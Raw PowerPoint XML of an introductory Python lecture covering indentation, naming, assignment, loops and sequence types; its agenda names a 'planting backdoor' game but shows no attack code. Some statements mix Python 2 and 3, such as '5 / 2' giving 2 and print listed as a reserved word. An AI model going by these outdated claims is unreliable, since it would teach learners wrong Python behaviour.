              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logical operators are words (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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or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not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) not symbols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The basic printing command is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print()</a:t>
            </a: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985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Code Runs First?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2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>When your script is run by passing it as a command to the Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>interpreter,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>myscript.py </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Here is what happens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ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>of the code that is at indentation level 0 gets executed. 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ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Functions and classes that are defined are, well, defined, but none of their code gets run. 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ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Unlike other languages, there's no main() function that gets run automatically - the main() function is implicitly all the code at the top level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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612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Motivating game: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Planting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backdoor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History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Running Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basics &amp; Names </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assignment &amp; Loop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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Sequences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types: Lists, Tuples, and Strings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Mutability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Function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Hands-on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lab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5" name="Picture 4" descr="Python – Taccle3 English sit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240" y="44958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1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Integers (default for numbers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 5 / 2  # Answer 2, integer division</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Floats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x = 3.456</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to specify with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unmatched quote can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>occur within the string: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"matt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>s"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8032680" y="4293360"/>
              <a:ext cx="260640" cy="226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6560" y="4289040"/>
                <a:ext cx="275040" cy="23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061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Whitespace is meaningful in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python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especially </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>indentation and placement of newlines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a newline to end a line of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code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“Enter” key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Use \ when must go to next line prematurely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>No braces {} to mark blocks of code, use consistent indentation instead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First line with less indentation is outside of the block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First line with more indentation starts a nested block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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Colons start of a new block in many constructs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, e.g. function definitions, then clauses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9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Start comments with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a hash mark #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rest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of line is ignored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can include a “documentation string” as the first line of a new function or class you define</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300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fact(x):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    # Documentation string. Discouraged!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    """Returns the factorial of its argument, assumed to be a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>posint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"""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    assert (x &gt;= 0), "no negative factorial"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    if x == 0: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        return 1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    return x * fact(x - 1)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5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3501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Binding a variable in Python means setting a name to hold a reference to some object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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create a name the first time it appears on the left side of an assignment expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:    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x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A reference is deleted via garbage collection after any names bound to it have passed out of scope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93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Names are case sensitive and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cannot start with a number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. 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They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can contain letters, numbers, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>underscores.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bob  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bob  _bob  _2_bob_  bob_2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BoB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There are some reserved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>words: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and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, assert, break, class, continue, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, del, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, else, except, exec, finally, for, from, global, if, import, in, is, lambda, not, or, pass, print, raise, return, try, while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256920" y="2125080"/>
              <a:ext cx="3006360" cy="2729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4400" y="2121480"/>
                <a:ext cx="3012120" cy="27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26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</a:t>
            </a:r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Python community has these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>recommended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>naming conventions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>joined_lower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for functions, methods and, attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>joined_lower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or ALL_CAPS for constants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>StudlyCaps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>classes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E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BackColor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i="1" dirty="0" err="1"/>
              <a:t>camelCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> only to conform to pre-existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>conventions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E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>backColor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Attributes: interface, _internal, __private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969120" y="887040"/>
              <a:ext cx="7921800" cy="37292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5160" y="884160"/>
                <a:ext cx="7931520" cy="373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353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You can assign to multiple names at the same time </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>x, y = 2, 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This makes it easy to swap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; x, y = y, x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assignments can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>chained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" smtClean="0"/>
              <a:t>a=b=x=2</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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867320" y="1986840"/>
              <a:ext cx="1050480" cy="3988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2640" y="1982880"/>
                <a:ext cx="1060200" cy="399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972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Motivating game: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Planting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>backdoor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History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Running Python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Basics &amp; Names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&amp;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Assignment &amp; Loop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Sequences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types: Lists, Tuples, and Strings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Mutability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Function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Exceptions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Hands-on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lab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 descr="Python – Taccle3 English sit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240" y="44958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3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Non-Existent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Accessing a name before it’s been properly created (by placing it on the left side of an assignment), raises an error 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i="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Traceback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> (most recent call last):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>  File "&lt;pyshell#12&gt;", line 1, in &lt;module&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>    c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>NameError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>: name 'c' is not defined</a:t>
            </a:r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i="1" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>c=3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>&gt;&gt;&gt; c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>3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618200" y="2245320"/>
              <a:ext cx="411120" cy="3589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4960" y="2242080"/>
                <a:ext cx="417960" cy="36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424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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Python’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> statement iterates over the items of any sequence (a list or a string), in the order that they appear in the sequence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/>
              <a:t>&gt;&gt;&gt; # Measure some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>strings in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>list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... words = ['cat', 'window', 'defenestrate']</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&gt;&gt; for w in words:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...     print(w, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(w))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cat 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>window 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>defenestrate 12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210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Motivating game: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Planting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backdoor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History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Running Python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Basics &amp; Names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&amp;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Assignment &amp; Loop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Sequences </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>types: Lists, Tuples, and Strings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Mutability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Function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Exceptions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Hands-on lab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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Download Cute Snake Transparent Image HQ PNG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39" y="4492929"/>
            <a:ext cx="1562520" cy="91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9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Tuple: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‘john’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>32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A simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>immutable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ordered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sequence of items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Items can be of mixed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strings: 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smtClean="0"/>
              <a:t>John Smith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Immutable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conceptually very much like a tuple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List: [1, 2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'john', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'up', 'down')]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ordered sequence of items of mixed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73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All three sequence types (tuples, strings, and lists) share much of the same syntax and functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key difference: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Tuples and strings are immutable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Lists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are mutable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The operations shown in this section can be applied to all sequence types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most examples will just show the operation performed on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965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Define Sequence Types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32560"/>
            <a:ext cx="7924800" cy="481584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Define tuples using parentheses and commas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = (23, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>', 4.56, (2,3), '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>')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&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tu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(23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>', 4.56, (2, 3), '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Define lists are using square brackets and commas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" dirty="0"/>
              <a:t>li = ["abc", 34, 4.34, 23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Define strings using quotes (“, ‘, or “““).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>st</a:t>
